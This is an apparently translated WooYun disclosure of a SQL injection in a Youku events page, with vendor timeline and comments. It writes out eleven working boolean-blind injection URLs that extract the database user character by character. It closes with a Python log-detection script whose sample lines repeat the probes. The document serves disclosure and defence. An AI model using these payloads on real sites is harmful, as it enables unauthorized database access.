
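Vulnerability summary

Bug ID: wooyun-2013-031626

Title: SQL injection on a Youku subsite

Vendor: Youku

Author: 1ee

Submitted: 2013-07-21 14:53

Fixed: 2013-09-04 14:54

Made public: 2013-09-04 14:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by the vendor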

Source: http://www.wooyun.org



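Vulnerability details

Disclosure status:

2013-07-21: Details reported to the vendor, awaiting vendor handling
2013-07-21: Vendor has confirmed; details disclosed only to the vendor
2013-07-31: Details disclosed to core white hats and experts in related fields
2013-08-10: Details disclosed to regular white hats
2013-08-20: Details disclosed to trainee white hats
2013-09-04: Details disclosed to the public

Brief description:

Saw 奇迹 hunting for bugs, so here I am too

Detailed description:

First, the injection point: http://events.youku.com/zuqiubaobei/index.php?realname=李燕
(I don't know this 李燕; I just picked a random entry to inject)
This injection point is a string-type injection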

[Screenshot: QQ截图20130721144138.jpg]

[Screenshot: QQ截图20130721144147.jpg]


Next:

http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,1,1%29%29=115,1,0%29%29=1%20and%20%271%27=%271  // s
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,2,1%29%29=108,1,0%29%29=1%20and%20%271%27=%271 // l
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,3,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 //a
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,4,1%29%29=118,1,0%29%29=1%20and%20%271%27=%271 //v
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,5,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //e
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,6,1%29%29=95,1,0%29%29=1%20and%20%271%27=%271 //_
http://events.youku.com/zuqiubaobei/index.php?realname=李燕' and (select if(ascii(substring(user(),7,1))=114,1,0))=1 and '1'='1 //r
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,8,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //e
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,9,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 //a
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,10,1%29%29=100,1,0%29%29=1%20and%20%271%27=%271 //d
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,11,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //e


I won't keep injecting by hand - -

Proof of vulnerability:

This injection point is a string-type injection

[Screenshot: QQ截图20130721144138.jpg]

[Screenshot: QQ截图20130721144147.jpg]

Remediation:

You are the experts

Copyright notice: when reposting, please credit the source 1ee@WooYun
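
The requests in the report above walk `substring(user(),N,1)` one offset at a time, which leaves a recognisable trail in web access logs. The following is an added example, not part of the original report: a log check that URL-decodes each query parameter, extracts `ascii(substring(expr,pos,len))=code` comparisons, and flags clients that step through several offsets of the same expression. The `<client> <request path>` log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# One character-compare probe: ascii(substring(<expr>,<pos>,<len>))=<code>
PROBE = re.compile(
    r"ascii\s*\(\s*(?:substring|substr|mid)\s*\(\s*(.+?)\s*,\s*(\d+)\s*,\s*\d+\s*\)\s*\)\s*=\s*(\d+)",
    re.IGNORECASE,
)

def find_probes(request_path):
    """Return (param, expr, position, char_code) for each probe in the query string."""
    hits = []
    # parse_qsl URL-decodes names and values, so %27/%28/%29 forms are covered too.
    for name, value in parse_qsl(urlsplit(request_path).query, keep_blank_values=True):
        for expr, pos, code in PROBE.findall(value):
            hits.append((name, expr.lower(), int(pos), int(code)))
    return hits

def flag_enumeration(log_lines, min_positions=3):
    """Group probes by (client, param, expr); keep groups that walk >= min_positions offsets."""
    seen = defaultdict(set)
    for line in log_lines:
        client, _, path = line.partition(" ")
        for name, expr, pos, _code in find_probes(path):
            seen[(client, name, expr)].add(pos)
    return {key: sorted(p) for key, p in seen.items() if len(p) >= min_positions}

# Constructed sample lines in "<client> <request path>" form (documentation IP ranges).
SAMPLE_LOG = [
    "203.0.113.7 /zuqiubaobei/index.php?realname=x%27%20and%20(select%20if(ascii(substring(user(),1,1))=115,1,0))=1%20and%20%271%27=%271",
    "203.0.113.7 /zuqiubaobei/index.php?realname=x%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,2,1%29%29=108,1,0%29%29=1%20and%20%271%27=%271",
    "203.0.113.7 /zuqiubaobei/index.php?realname=x%27%20and%20(select%20if(ascii(substring(user(),3,1))=97,1,0))=1%20and%20%271%27=%271",
    "198.51.100.20 /zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95",
    "198.51.100.20 /zuqiubaobei/index.php?realname=ascii%20art%20fan",
]

if __name__ == "__main__":
    for (client, param, expr), positions in flag_enumeration(SAMPLE_LOG).items():
        print(f"{client} param={param} expr={expr} positions={positions}")
```

Detection of this kind only shows that the parameter was being walked; the root fix is to bind `realname` as a query parameter instead of concatenating it into the SQL string.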


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2013-07-21 16:09

Vendor reply:

Fix in progress

Latest status:

None


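Vulnerability evaluation:

Comments

  1. 2013-07-21 15:02 | 齐迹 ( Core white hat | Rank:784 Vulnerabilities:100 | An ordinary PHP developer who follows web security.)

    Please type my name correctly! Thanks for your cooperation

  2. 2013-07-21 15:04 | 1ee ( Regular white hat | Rank:105 Vulnerabilities:14 | Reading books....)

    @齐迹 OK - -

  3. 2013-07-21 15:06 | 1ee ( Regular white hat | Rank:105 Vulnerabilities:14 | Reading books....)

    @齐迹 Already changed it, waiting for review - -

  4. 2013-07-21 15:09 | 齐迹 ( Core white hat | Rank:784 Vulnerabilities:100 | An ordinary PHP developer who follows web security.)

    @1ee You actually changed it.. I give up on you!

  5. 2013-07-21 15:16 | 1ee ( Regular white hat | Rank:105 Vulnerabilities:14 | Reading books....)

    @齐迹 I really did change it - -, the reviewers are probably going to be swamped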